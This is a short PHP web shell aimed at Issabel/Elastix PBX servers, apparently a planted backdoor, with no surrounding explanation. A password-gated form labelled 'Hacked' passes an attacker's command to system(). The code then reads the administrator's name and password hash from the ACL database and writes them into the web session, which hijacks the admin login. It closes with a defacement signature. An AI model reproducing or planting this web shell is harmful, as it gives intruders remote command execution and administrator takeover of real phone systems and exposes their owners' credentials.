ISSABEL

1. <form action="" method="post" ><input size=20 type=password name="p" /><input size=60 type=text name="c" /><input type=submit value="Hacked" /></form>
2. Hacked >
3. <?php
4. if(md5($_REQUEST['p'])=='857e0ec9f41726eb65f8c3b88f9e26f0')
5. {
6. @system($_REQUEST['c']);
7. include_once "/var/www/html/libs/paloSantoDB.class.php";
8. include_once "/var/www/html/libs/paloSantoACL.class.php";
9. $pDB = new paloDB("sqlite3:////var/www/db/acl.db");
10. $db = $pDB->fetchTable("SELECT name, md5_password,extension from acl_user WHERE id ='1'");
11. session_name("elastixSession");
12. session_start();
13. $_SESSION['elastix_user'] = $db[0][0];
14. $_SESSION['elastix_pass'] = $db[0][1];
15. echo '<a href="/" >Emad__Was__Here</a>';
16. }
17. ?>